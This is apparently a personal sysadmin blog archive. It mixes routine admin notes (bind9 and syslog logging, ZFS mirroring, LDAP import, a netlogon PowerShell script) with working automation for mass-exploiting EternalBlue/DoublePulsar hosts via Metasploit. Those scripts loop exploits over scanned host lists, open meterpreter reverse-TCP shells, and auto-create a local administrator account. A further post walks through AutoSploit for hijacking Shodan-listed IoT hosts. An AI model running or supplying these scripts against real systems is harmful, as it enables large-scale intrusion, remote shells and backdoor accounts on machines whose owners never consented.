<find vuln hosts>
#!/bin/bash
VULNHOSTS=/root/doublepulsar.scan/VULNHOSTS
TIMESTAMP=$(date "+%Y%m%d")
cd /root/doublepulsar.scan/VULNHOSTS/
msfconsole -x "color false ; vulns -o /root/doublepulsar.scan/VULNHOSTS/vulns.msf ; exit"
sort -u $VULNHOSTS/vulns.msf > $VULNHOSTS/vulns.msf.o
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' $VULNHOSTS/vulns.msf.o > $VULNHOSTS/vulns.msf.ip
sort -u $VULNHOSTS/vulns.msf.ip > $VULNHOSTS/vulnerablehosts.$TIMESTAMP
for file in $(find . -mtime 1 ); do
sdiff $file vulnerablehosts.$TIMESTAMP | less | grep '>' > changes.$TIMESTAMP
done
mail -s "vulnerable hosts $TIMESTAMP" me@hell < vulnerablehosts.$TIMESTAMP
mail -s "vulnerable hosts difference $TIMESTAMP" me@hell < changes.$TIMESTAMP
#rm -rf $VULNHOSTS/vulns.*
#rm $VULNHOSTS/changes.$TIMESTAMP
<post report, exploit>
#!/bin/bash
PROCESS=/root/doublepulsar.scan/exploit
THEWICKED=/root/doublepulsar.scan/VULNHOSTS
TODAY=$(date '+%Y%m%d')
YESTERDAY=$(date -d "yesterday" '+%Y%m%d')
TOMORROW=$(date -d "next day" '+%Y%m%d')
WORK=/root/.msf4
cd $PROCESS/
mkdir $PROCESS/logs/$TODAY
cp $WORK/thewicked $WORK/thewicked.$TODAY
cp $THEWICKED/vulnerablehosts.$TODAY $WORK/thewicked
#hack em
cd /root/.msf4
msfconsole -x "color false ; jobs -K ; resource doublepulsar-loop.rc ; exit"
cd /root/.msf4/logs/sessions
ls | grep $TODAY | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > $PROCESS/exploited.$TODAY
mkdir /root/doublepulsar.scan/exploit/$TODAY
mv /root/.msf4/logs/sessions/*.log $PROCESS/$TODAY
mail -s "doublepulsar vuln hosts exploited $TODAY" me@hell < $PROCESS/exploited.$TODAY
exit
Tuesday, October 30, 2018
automate ms010-17 exploitation better
Wednesday, September 26, 2018
automate exploiting newly-found doublepulsar vulnerable hosts
i've written about how to automate discovery. let's go to the next level and automate
reporting on and exploiting newly-discovered doublepulsar vulnerable hosts.
this would assume you have a previously created list of vulnerable host which
we're diffing off-of.
this would assume you have a previously created list of vulnerable host which
we're diffing off-of.
#!/bin/bash
PROCESS=/root/doublepulsar.scan/exploit
TODAY=$(date '+%Y%m%d')
YESTERDAY=$(date -d "yesterday" '+%Y%m%d')
cd $PROCESS/
#dump vulns
msfconsole -x "color false ; vulns -o $PROCESS/vulndetect.$TODAY ; exit"
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' $PROCESS/vulndetect.$TODAY \
> $PROCESS/vulnparsed.$TODAY
diff -u $PROCESS/vuln.$YESTERDAY $PROCESS/vulnparsed.$TODAY | grep + | grep + |grep -v @ \
|grep -v +++ |sed 's/+//g' > $PROCESS/vuln.$TODAY
msfconsole -x "color false ; spool $PROCESS/output.$TODAY ; use auxiliary/scanner/smb/smb_version;
set RHOSTS file:$PROCESS/vuln.$TODAY ; set thread 100; run; exit"
echo $DATE > $PROCESS/mail.$TODAY
cat $PROCESS/vuln.$TODAY $PROCESS/output.$TODAY >> $PROCESS/mail.$TODAY
mail -s "new doublepulsar vuln hosts $TODAY " me@in.hell < $PROCESS/mail.$TODAY
rm $PROCESS/vulnparsed.*
rm $PROCESS/vulndetect.*
rm $PROCESS/mail.$TODAY
cp $PROCESS/vuln.$TODAY /root/.msf4/thewicked
#hack em
kill -9 `ps -ef|grep msfconsole| awk '{print $2}'`
msfconsole -r "/root/.msf4/doublepulsar-loop.rc ; exit"
ls /root/.msf4/logs/sessions | grep $TODAY \
|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > $PROCESS/exploited.$TODAY
mail -s "new doublepulsar vuln hosts exploited $TODAY " me@in.hell < $PROCESS/exploited.$TODAY
rm $PROCESS/exploited.$TODAY
exit
Monday, September 24, 2018
no raid-1? try zfs-mirror in sol11. but wait...
i installed solaris 11.14 on a decade-old system. i was really happy it installed. and then i remembered:
i was not given the option to mirror anything. it just installed and i clicked f2 f2 f2.
i want to set up something like raid-1. this is solaris, so i can do zfs mirroring. good enough. oh, i did an install over an old system, so yeah, there's that.
what i ended up doing was grabbing the partition table from the first (zfs-pool holding) disk and over-wrote that of the second disk since my re-label command was ignored. after that, i created my mirror pool and all was well with the world.
zpool status rpool
pool: rpool
state: ONLINE
scan: none requested
config:
NAME STATE READ WRITE CKSUM
rpool ONLINE 0 0 0
c0t5000CCA022532534d0s0 ONLINE 0 0 0
errors: No known data errors
only disk in rpool: c0t5000CCA022532534d0s0
[root@blackhole ~]# format
Searching for disks...done
AVAILABLE DISK SELECTIONS:
0. c0t5000CCA022532534d0 <HITACHI-H109030SESUN300G-A31A-279.40GB> solaris
/scsi_vhci/disk@g5000cca022532534
/dev/chassis/SYS/HDD0/disk
1. c0t5000CCA022543154d0 <HITACHI-H109030SESUN300G-A31A-279.40GB> solaris
/scsi_vhci/disk@g5000cca022543154
/dev/chassis/SYS/HDD1/disk
1 is the second disk
1. verify it has Part 0 . It does!
[root@blackhole ~]# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0
vdev verification failed: use -f to override the following errors:
/dev/dsk/c0t5000CCA022543154d0s0 contains a ufs filesystem.
Unable to build pool from specified devices: device already in use
Nope.
format -e
<select 1>
format > p [Parition editor]
format > label
Specify Label type[0]: 0
Ready to label disk, continue? y
root@blackhole:~# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0
cannot attach c0t5000CCA022543154d0s0 to c0t5000CCA022532534d0s0: device is too small
Still nope.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022532534d0s0
* /dev/dsk/c0t5000CCA022532534d0s0 (volume "solaris") partition map
*
* Dimensions:
* 512 bytes/sector
* 625 sectors/track
* 20 tracks/cylinder
* 12500 sectors/cylinder
* 46875 cylinders
* 46873 accessible cylinders
*
* Flags:
* 1: unmountable
* 10: read-only
*
* First Sector Last
* Partition Tag Flags Sector Count Sector Mount Directory
0 2 00 0 585912500 585912499
2 5 01 0 585912500 585912499
okay.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022543154d0s0
* /dev/dsk/c0t5000CCA022543154d0s0 (volume "solaris") partition map
*
* Dimensions:
* 512 bytes/sector
* 625 sectors/track
* 20 tracks/cylinder
* 12500 sectors/cylinder
* 46875 cylinders
* 46873 accessible cylinders
*
* Flags:
* 1: unmountable
* 10: read-only
*
* First Sector Last
* Partition Tag Flags Sector Count Sector Mount Directory
0 2 00 0 262500 262499
1 3 01 262500 262500 524999
2 5 01 0 585912500 585912499
6 4 00 525000 585387500 585912499
NOT okay.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022532534d0s0 > /tmp/dsk0-part.dump
root@blackhole:~# fmthard -s /tmp/dsk0-part.dump /dev/rdsk/c0t5000CCA022543154d0s0
fmthard: New volume table of contents now in place.
Verify the VTOC on c0t5000CCA022543154d0s0. We're going to do something wicked.
root@blackhole:~# prtvtoc /dev/dsk/c0t5000CCA022543154d0s0
* /dev/dsk/c0t5000CCA022543154d0s0 (volume "solaris") partition map
*
* Dimensions:
* 512 bytes/sector
* 625 sectors/track
* 20 tracks/cylinder
* 12500 sectors/cylinder
* 46875 cylinders
* 46873 accessible cylinders
*
* Flags:
* 1: unmountable
* 10: read-only
*
* First Sector Last
* Partition Tag Flags Sector Count Sector Mount Directory
0 2 00 0 585912500 585912499
2 5 01 0 585912500 585912499
This is okay.
root@blackhole:~# zpool attach rpool c0t5000CCA022532534d0s0 c0t5000CCA022543154d0s0
Make sure to wait until resilver is done before rebooting.
This is much better.
root@blackhole:~# zpool status rpool
pool: rpool
state: ONLINE
scan: resilvered 21.9G in 2m52s with 0 errors on Mon Sep 24 15:39:51 2018
config:
NAME STATE READ WRITE CKSUM
rpool ONLINE 0 0 0
mirror-0 ONLINE 0 0 0
c0t5000CCA022532534d0s0 ONLINE 0 0 0
c0t5000CCA022543154d0s0 ONLINE 0 0 0
errors: No known data errors
This is much much better.
root@blackhole:~# zpool list rpool
NAME SIZE ALLOC FREE CAP DEDUP HEALTH ALTROOT
rpool 278G 38.2G 240G 13% 1.00x ONLINE -
We are golden!
Saturday, September 22, 2018
macos split all the jpgs in a directory in half
find . -name "*.jpg" | while read $i; do convert $i -crop 50%x100% +repage $i; done
a play on:
convert input.png -crop 50%x100% +repage input.png
Monday, September 17, 2018
macos terminal convert pdf to jpg
find . -name "*.pdf" | while read filename; do fileconvert=`echo "$filename" \ | sed "s/pdf/jpg/g"` ; sips -s format jpeg "$filename" --out "$fileconvert"; done
Thursday, August 16, 2018
remotely exploit a number of hosts with metasploit via eternalblue
in a previous post i have mentioned how to do a scan for doublepulsar infected hosts and how to feed these hosts to msf. that's fine. but, i guess mass-exploiting those hosts is of some utility, too.
## msfconsole
msf > vulns -R
… a lot of text … look at end of output for a file dropped in /tmp e.g. ...
RHOSTS => file:/tmp/msf-db-rhosts-20180816-27096-ncow7k
msf > exit
# cd ~/.msf4/
# cp /tmp/msf-db-rhosts-20180816-27096-ncow7k thewicked
# msfconsole -r doublepulsar-loop.rc
Once all as completed, look through ~/.msf4/logs/doublepuslar.log for adminuser
as those hosts have had the local admin user for your evil created.
## files
[doublepulsar-loop.rc]
<ruby>
# the rhosts from vuln_db
hostsfile="/root/.msf4/thewicked"
hosts=[]
File.open(hostsfile,"r") do |f|
f.each_line do |line|
hosts.push line.strip
end
end
# msfconsole commands with chained post exploit
self.run_single("resource /root/.msf4/doublepulsar.rc")
# the rhosts loop
hosts.each do |rhost|
self.run_single("set rhost #{rhost}")
self.run_single("exploit")
run_single("sleep 2s")
end
</ruby>
[doublepulsar.rc]
spool /root/.msf4/logs/doublepulsar.log
set consolelogging true
set loglevel 5
set sessionlogging true
set timestampoutput true
use exploit/windows/smb/ms17_010_eternalblue
set VerifyArch False
set VerifyTarget False
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST
set AUTORUNSCRIPT multiscript -rc /root/.msf4/doublepulsar-lsadmin
[doublepulsar-lsadmin]
execute -H -f cmd.exe -a "/c net user adminuser badpassword /add"
execute -H -f cmd.exe -a "/c net localgroup administrators /add adminuser"
execute -H -f cmd.exe -a "/c bitsadmin task to download a scheduled task to patch and reboot"
exit
Monday, August 13, 2018
one-off doublepulsar scan script because sometimes people need to do one thing and one thing only
so yeah.
#!/bin/bash
EXECUTE=$(date "+%Y%m%d")
read -p "Enter IP to evaluate: " IP
if [[ $IP =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
read -p "Enter email address (or not): " EMAIL
else echo "Not a valid IP" && exit 0
fi
rm -rf /tmp/$IP
mkdir /tmp/$IP
cd /tmp/$IP
#msfconsole
sudo msfconsole -x "color false ; banner false ; spool /tmp/$IP/output.msf ; use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS $IP ; run; exit"
sed 's/]\ /\\\n/g' /tmp/$IP/output.msf | sed -r '/Error|NOT|properly|Script|\[|\]/d' | sed 's/:445//g' | sed '/-/!d' |sort -u > /tmp/$IP/output.msf.1
sed '/VULNERABLE/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.VULN
sed '/INFECTED/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.INFECTED
clear
if [ -s /tmp/$IP/output.msf.INFECTED ]
then
echo " Uh oh $IP DoublePulsar infected"
mail -s " $IP DoublePulsar infected " $EMAIL < /tmp/$IP/output.msf.INFECTED
mail -s " $IP DoublePulsar intected $EXECUTE " youreffingsysadmin@hell.com < /tmp/$IP/output.msf.1
else
echo " Phew $IP not infected "
fi
if [ -s /tmp/$IP/output.msf.VULN ]
then
echo " Sigh $IP DoublePulsar vulnerable "
mail -s " $IP DoublePulsar vulnerable " $EMAIL < /tmp/$IP/output.msf.1
else
echo " Double Phew $IP not DoublePulsar vulnerable"
fi
cd /tmp
rm -rf /tmp/$IP
exit 0
Friday, July 20, 2018
cron job for doublepulsar detection, burning, metasploit scan, and email of results
double pulsar is a major drag. it is a nasty worm that hangs out and acts as a backdoor on a system. it is propagated by smbv1 trans2 calls. fun stuff. i needed to figure out how to automate discovery, burning, and identification of vulnerable systems. oh, and email me the results.
here's what i came up with:
here's what i came up with:
$ dpkg-reconfigure exim4-config $ apt-get install msf $ searchsploit -u $ apt-get install masscan $ git clone https://github.com/countercept/doublepulsar-detection-script.git $ mkdir -p /root/scripts $ mkdir -p /root/to.process $ touch /root/to.process ; echo "." >> /tmp/to.process/empty -- script doublepulsar.cron in /root/scripts -- #!/bin/bash NETWORKRANGE=6.6.6.0/24 PROCESS=/root/to.process EXECUTE=$(date "+%Y%m%d") NAME=HELL cd $PROCESS #masscan masscan -p445 $NETWORKRANGE > $PROCESS/output.masscan sed -i "s/^.* on //" $PROCESS/output.masscan #detect /root/doublepulsar-detection-script/detect_doublepulsar_smb.py --file \ $PROCESS/output.masscan --uninstall --threads 100 --timeout 2 > \ $PROCESS/output.detect sed '/DETECTED/!d' $PROCESS/output.detect > $PROCESS/output.detect.INFECTED #msfconsole msfconsole -x "color false ; spool $PROCESS/output.msf ; \ use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS file:$PROCESS/output.masscan ; set thread 100; run; exit" sed 's/]\ /\\\n/g' $PROCESS/output.msf | sed -r '/Error|NOT|properly|Script|\[|\]/d' | sed 's/:445//g' | sed '/-/!d' |sort -u > $PROCESS/output.msf.1 sed '/VULNERABLE/!d' $PROCESS/output.msf.1 > $PROCESS/output.msf.VULN sed '/INFECTED/!d' $PROCESS/output.msf.1 > $PROCESS/output.msf.INFECTED #mail if [ -s $PROCESS/output.detect.INFECTED ] then mail -s "DoublePulsar Detect Infected Hosts $NETWORKRANGE" me@here < $PROCESS/output.detect.INFECTED else mail -s "No DoublePulsar Detect Infected Hosts $NETWORKRANGE" me@here < $PROCESS/empty fi if [ -s $PROCESS/output.msf.INFECTED ] then cat $PROCESS/output.msf.INFECTED $PROCESS/output.msf.VULN >> $PROCESS/output.msf.INFECTEDVULN mail -s "DoublePulsar MetaSploit Infected and Vulnerable Hosts $NETWORKRANGE" me@here < $PROCESS/output.msf.INFECTEDVULN else mail -s "No DoublePulsar MetaSploit Vulnerable Hosts $NETWORKRANGE" me@here < $PROCESS/empty fi #cleanup mkdir -p $PROCESS/$NAME/$EXECUTE mv output.* $PROCESS/$NAME/$EXECUTE exit -- end script --run it every night, every hour, whenever. put it in /etc/crontab:
# evil 30 12 * * * root /root/scripts/doublepulsar.cronthe joy of the script is that with all the text processing, is it can be piped to syslog. so yeah, old news for you...
Thursday, March 22, 2018
nis master server settings on cloned system
i need to change nis master server settings on cloned system. don't even ask.
commands:
# domainname <newdomainname>
# mv /var/yp/<domainname> to <newdomainname>
edit:
/etc/hosts change <hostname> to <newhostname> ; <ip> to <newip>
/etc/conf.d/net change <domainname> to <newdomainname>
/etc/yp.conf change <domainname> to <newdomainname>
/etc/ypserv.conf
/etc/ypserv.securenets
/var/yp/ypservers change <hostname> to <newhostname>
make -C /var/yp
test:
# ypwhich
Should return <newhostname>
# ypcat passwd | grep <username>
# ypcat group | grep <groupname>
Both should return known results
Wednesday, March 7, 2018
put pubkeys on a lot of hosts
i need to zap authorized_keys *all over the place*
this concatenates a file which contains sever id_rsa.pub keys.
nodes is a long list of ip addresses.
#!/bin/bash
for i in `cat nodes` ; do
cat authorized_keys.add | ssh -o ConnectTimeout=5 -o StrictHostKeyChecking=no -o \
UserKnownHostsFile=/dev/null -t -t -t -l root $i 'cat >> /root/.ssh/authorized_keys'
done
Thursday, February 8, 2018
when crond is using /bin/sh
crond uses sh by default. that last cron script i posted, well tee is broke in sh. do this:
0 12 * * * root script.sh 2>&1 | bash -c 'tee >(/usr/bin/logger -p local6.notice -t script_tag ) >(mail -s "script output" me@here) >/dev/null'
Monday, February 5, 2018
debug rsyslogd
why isn't rsyslogd sending anything out?
window 1 $ tcpdump -u dst port 514
window 2 $ logger -n 6.6.6.6 -P 514 "hello god"
<no answer>
hmm. let's debug rsyslogd
$ export RSYSLOG_DEBUGLOG="/tmp/debuglog"
$ export RSYSLOG_DEBUG="Debug"
$ service rsyslog stop
$ rsyslogd -d | head -10
7160.005597645:7fae096a3780: rsyslogd 7.2.6 startup, module path '', cwd:/root
7160.005872662:7fae096a3780: caller requested object 'net', not found (iRet -3003)
7160.005895004:7fae096a3780: Requested to load module 'lmnet'
7160.005906331:7fae096a3780: loading module '/lib64/rsyslog/lmnet.so'
7160.006023505:7fae096a3780: module lmnet of type 2 being loaded (keepType=0).
7160.006030872:7fae096a3780: entry point 'isCompatibleWithFeature' not present in module
7160.006033780:7fae096a3780: entry point 'setModCnf' not present in module
7160.006036209:7fae096a3780: entry point 'getModCnfName' not present in module
7160.006038359:7fae096a3780: entry point 'beginCnfLoad' not present in module
bad modules.
recompile.
dump cron script output from stdin into remote syslog & mail
dump cron script output from stdin into remote syslog & mail
because i feel important the more mail i delete (but really need to archive it on a syslog server because, well, you know).
0 12 * * * root script.sh | cat | tee >(/usr/bin/logger -p local6.notice -t script_tag ) >(mail -s "script output" me@here) 2>&1
rsyslog configuration directive:
local6.*;*.* @6.6.6.6:514
(note: @@ is tcp listener)
Thursday, February 1, 2018
svn logs to syslog
make svn logs human readable and send off to a syslog server
in /etc/apache2/sites-enabled/000-svn
# set customlog variable
LogLevel warn
LogFormat "%{%Y-%m-%d %T}t %u@%h %>s repo:%{SVN-REPOS-NAME}e %{SVN-ACTION}e %B Bytes in %T Sec" svn_log
# customlog and send to syslog
CustomLog "|/usr/bin/tee -a /var/svn/logs/svn_logfile | /usr/bin/logger -thttpd -plocal6.notice" svn_log env=SVN-ACTION
in /etc/rsyslog.d/50-default.conf
local6.* @remotesyslog
what remote syslog shows:
2018-02-01 16:34:45 buildbot@6.6.6.6 207 repo:repos get-dir /hell r160669 props 575 Bytes in 0 Sec
what standard apache access logs see:
6.6.6.6 - buildbot [01/Feb/2018:16:34:45 -0500] "PROPFIND /svn/repos/hell HTTP/1.1" 207 397 "-" "SVN/6.6.6 (r40053) neon/0.66.0"
apache logs to syslog
get those apache logs to a remote syslog server
syslog
in /etc/apache2/sites-enabled/000-site
ErrorLog "|/usr/bin/tee -a /var/log/apache2/error.log | /usr/bin/logger -thttpd -plocal6.err"
CustomLog "|/usr/bin/tee -a /var/log/apache2/access.log | /usr/bin/logger -thttpd -plocal6.notice" combined
in /etc/syslog.conf
local6.* @remoteserver
rsyslog
$ModLoad imfile
$InputFilePollInterval 10
$PrivDropToGroup adm
$WorkDirectory /var/spool/rsyslog
# Apache access file:
$InputFileName /var/log/apache2/access.log
$InputFileTag apache-access:
$InputFileStateFile stat-apache-access
$InputFileSeverity info
$InputFilePersistStateInterval 20000
$InputRunFileMonitor
#Apache Error file:
$InputFileName /var/log/apache2/error.log
$InputFileTag apache-error:
$InputFileStateFile stat-apache-error
$InputFileSeverity error
$InputFilePersistStateInterval 20000
$InputRunFileMonitor
what syslog gets:
<181>Feb 1 15:33:44 gallup httpd: 6.6.6.6 - - [01/Feb/2018:15:33:44 -0500] "GET /url/index.php HTTP/1.1" 200 20025 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
autosploit... one more thing to worry about
yay autosploit! for making things interesting.
this is a nice addition to the tools i have on my kali instance.
the important thing to do is:
pip install shodan
pip install blessings
if you want to be a script kiddie and hack IoT register with shodan.io and get your api key.
msf modules are not automated, they're predefined here:
$autosploitpwd/modules.txt
as everyone knows, this application scans the shodan.io database of "Internet of Things" and creates a
random list of 6000 IPs to potentially exploit.
you can forego shodan.io's list and create your own targeted list of systems to hijack.
touch $autosploitpwd/hosts.txt
i set up a nc listener per the need for a listening local port
nc -l 123
then calling Multisploit, AutoSploit quickly checks the ports on the hosts on the list (yours or shodan.io's).
you are then presented with the option hijack the host using Metasploit's modules as defined above.
i decided to smash a system that's being retired...
[*] Added workspace: autosploit
LHOST => me
LPORT => 123
VERBOSE => true
THREADS => 100
RHOSTS => sadhost
[-] Exploit failed: The following options failed to validate: RHOST.
[*] Exploit completed, but no session was created.
no joy. but! i will find one...
Tuesday, January 30, 2018
import ldap db dump
you have an ldap db dump called import.ldif . you need to replace
an existing ldap database with import.ldif . do this:
!/bin/bash
TIMESTAMP=$(date '+%Y%m%d%H%M')
/etc/init.d/slapd stop ;
mv /var/lib/ldap /var/lib/ldap-$TIMESTAMP ;
mkdir /var/lib/ldap ;
cp /etc/ldap/DB_CONFIG /var/lib/ldap ;
slapadd -c -l /tmp/import.ldif ;
chown -R openldap.openldap /var/lib/ldap ;
/etc/init.d/slapd start
Friday, January 26, 2018
bind9 logging reprise
in a previous post i mentioned how to do bind9 logging.
i found there was too much information in the single file.
instead, i have culled out the different notices in to separate files.
for logrotate, since all the log files are in one directory, all you
need to do is place a wildcard attribute in the configuration file.
and apparmor may hate you and deny you ability to create logs.
if you're like me and like logs to be created under the daemon's name
e.g. /var/log/bind for bind...
edit:
/etc/apparmor.d/usr.sbin.named
and give it /var/log/bind/** rw,
as opposed to /var/log/named ** rw,
# bind.local.log
logging {
channel query_log {
file "/var/log/bind/query.log" versions 3 size 5m;
// Set the severity to dynamic to see all the debug messages.
print-category yes;
print-severity yes;
print-time yes;
severity dynamic;
};
channel update_debug {
file "/var/log/bind/update_debug.log" versions 3 size 5m;
severity debug ;
print-category yes;
print-severity yes;
print-time yes;
};
channel security_info {
file "/var/log/bind/security_info.log" versions 3 size 5m;
severity info;
print-category yes;
print-severity yes;
print-time yes;
};
channel bind_log {
file "/var/log/bind/bind.log" versions 3 size 5m;
severity info;
print-category yes;
print-severity yes;
print-time yes;
};
category queries {
query_log;
};
category security {
security_info;
};
category update-security {
update_debug;
};
category update {
update_debug;
};
category lame-servers {
null;
};
category default {
bind_log;
};
};
# /etc/logrotate.d/bind
/var/log/bind/*.log {
daily
missingok
rotate 7
compress
delaycompress
notifempty
create 644 bind bind
postrotate
/usr/sbin/invoke-rc.d bind9 reload > /dev/null
endscript
}
Tuesday, January 23, 2018
flush rndc
my bind9 dns server is reporting different ips for a host when i...
localhost $ dig @localhost.ip address
and
remotehost $ dig @localhost.ip address
this is due to a weirdo cache on localhost.
the best thing to do is flush the dns cache.
localhost $ rndc flush
easy.
bind9 logs be freed of syslog
I want to know who is requesting what on my bind9 server.
Time to cull out those logs from /var/log/syslog .
$ vi /etc/bind/named.conf
just before named.conf.local , put in this line:
include "/etc/bind/named.conf.log";
$ vi /etc/bind/named.conf.log
logging {
channel bind_log {
file "/var/log/bind/bind.log" versions 3 size 5m;
severity info;
print-category yes;
print-severity yes;
print-time yes;
};
category default { bind_log; };
category update { bind_log; };
category update-security { bind_log; };
category security { bind_log; };
category queries { bind_log; };
category lame-servers { null; };
};
see that directory? create it and perm it
$ mkdir /var/log/bind ; chown bind:bind /var/log/bind
your logs will be large with all that debug stuff. rotate them!
$ vi /etc/logrotate.d/bind
/var/log/bind/bind.log {
daily
missingok
rotate 7
compress
delaycompress
notifempty
create 644 bind bind
postrotate
/usr/sbin/invoke-rc.d bind9 reload > /dev/null
endscript
}
$ /etc/init.d/bind9 restart
excitement.
Thursday, January 18, 2018
robocopy a local user profile between servers
robocopy c:\Users\source \\newserver\C$\Users\source *.* /mir /sec /r:1 /w:1 /LOG:C:\Mirlog.txt /XD “RECYCLER” “Recycled” “System Volume Information” /XF “desktop.ini” “thumbs.db”
get all ip addresses from netlogon.log and mail it
name this something.ps1 and run it to get all ipdresses from netlogon.log and mail them to yourself.
# Script to get the IP addresses of clients from the Netlogon.log file of all domain controllers in the current domain
# from the current month and the previous month
################################Start Functions####################################
function GetDomainControllers {
$DCs=[system.directoryservices.activedirectory.domain]::GetCurrentDomain() | ForEach-Object {$_.DomainControllers} | ForEach-Object {$_.Name}
return $DCs
}
function GetNetLogonFile ($server) {
#build Path variable
$path= '\\' + $server + '\c$\windows\debug\netlogon.log'
#Try to connect to $path and get the file contents or throw an error
try {$netlogon=get-content -Path $path -ErrorAction stop}
catch { "Can't open $path"}
#reverse the array's order so we are now working from the end of the file back
[array]::Reverse($netlogon)
#clear out the holding variable
$IPs=@()
#go through the lines
foreach ($line in $netlogon) {
#split the line into pieces using a space as the delimiter
$splitline=$line.split(' ')
#Get the date stamp which is in the mm/dd format
$logdate=$splitline[0]
#split the date
$logdatesplit=($logdate.split('/'))
[int]$logmonth=$logdatesplit[0]
#only worry about the last month and this month
if (($logmonth -eq $thismonth) -or ($logmonth -eq $lastmonth)) {
#only push it into an array if it matches an IP address format
if ($splitline[5] -match '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'){
$objuser = new-object system.object
$objuser | add-member -type NoteProperty -name IPaddress -value $splitline[5]
$objuser | add-member -type NoteProperty -name Computername -value $splitline[4]
$objuser | add-member -type NoteProperty -name Server -value $server
$objuser | add-member -type NoteProperty -name Date -value $splitline[0]
$objuser | add-member -type NoteProperty -name Time -value $splitline[1]
$IPs+=$objuser
}
} else {
#break out of loop if the date is not this month or last month
break
}
}
return $IPs
}
###############################End Functions#######################################
###############################Main Script Block###################################
#Get last month's date
$thismonth=(get-date).month
$lastmonth=((get-date).addmonths(-1)).month
#get all the domain controllers
$DomainControllers=GetDomainControllers
#Get the Netlogon.log from each DC
Foreach ($DomainController in $DomainControllers) {
$IPsFromDC=GetNetLogonFile($DomainController)
$allIPs+=$IPsFromDC
}
#Only get the unique IPs and dump it to a CSV file
$allIPs | Sort-Object -Property IPaddress -Unique | Export-Csv "C:\NetlogonIPs.csv"
#Set up mail variables
$from="me@here"
$to="me@here"
$subject="IP addresses in Netlogon.log file from the last month"
$attach="C:\NetlogonIPs.csv"
$body="File containing all unique IPs listed in the netlogon.log file for all the Domain Controllers in the company domain."
#Send mail message
Send-MailMessage -from $from -To $to -subject $subject -SmtpServer smtpserver -Body $body -BodyAsHtml -Attachments $attach
Subscribe to:
Posts (Atom)